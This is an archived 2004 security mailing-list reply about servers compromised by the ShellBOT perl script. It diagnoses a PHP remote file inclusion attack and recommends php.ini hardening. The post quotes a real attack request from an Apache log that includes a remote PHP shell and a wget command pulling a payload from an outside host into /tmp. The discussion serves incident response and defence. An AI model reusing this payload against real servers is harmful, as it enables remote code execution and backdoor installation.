Security Incidents mailing list archives
Re: Systems compromised with ShellBOT perl script - part 2
From: "Chris Norton" <kicktd_list () hotmail com>
Date: Thu, 21 Oct 2004 11:53:08 -0500
This sounds like it may be a typical fopen()/include() PHP exploit as this seems to be the motive for this group, As seen from the very first post:
Kirby Angell wrote: Yesterday we noticed a funny looking Apache log entry. It contained:
http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2 Where a remote php shell script file is used then the backdoor is uploaded onto the server. This can be avoided by setting the safe_mode setting in php.ini to on and disabled_functions: to include exec, popen, and passthru. -- Chris Norton UAT Student Software Engineering Network Defense
Current thread:
- Re: Systems compromised with ShellBOT perl script - part 2, (continued)
- Re: Systems compromised with ShellBOT perl script - part 2 Jeffrey Denton (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Martin Mačok (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Harry de Grote (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Stephen J. Smoogen (Oct 20)
- RE: Systems compromised with ShellBOT perl script - part 2 KEM Hosting (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Thomas Hochstein (Oct 21)
- Re: Systems compromised with ShellBOT perl script - part 2 Paul Schmehl (Oct 22)
- RE: Systems compromised with ShellBOT perl script - part 2 KEM Hosting (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Dave (Oct 20)
- Re: Systems compromised with ShellBOT perl script - part 2 Chris Norton (Oct 22)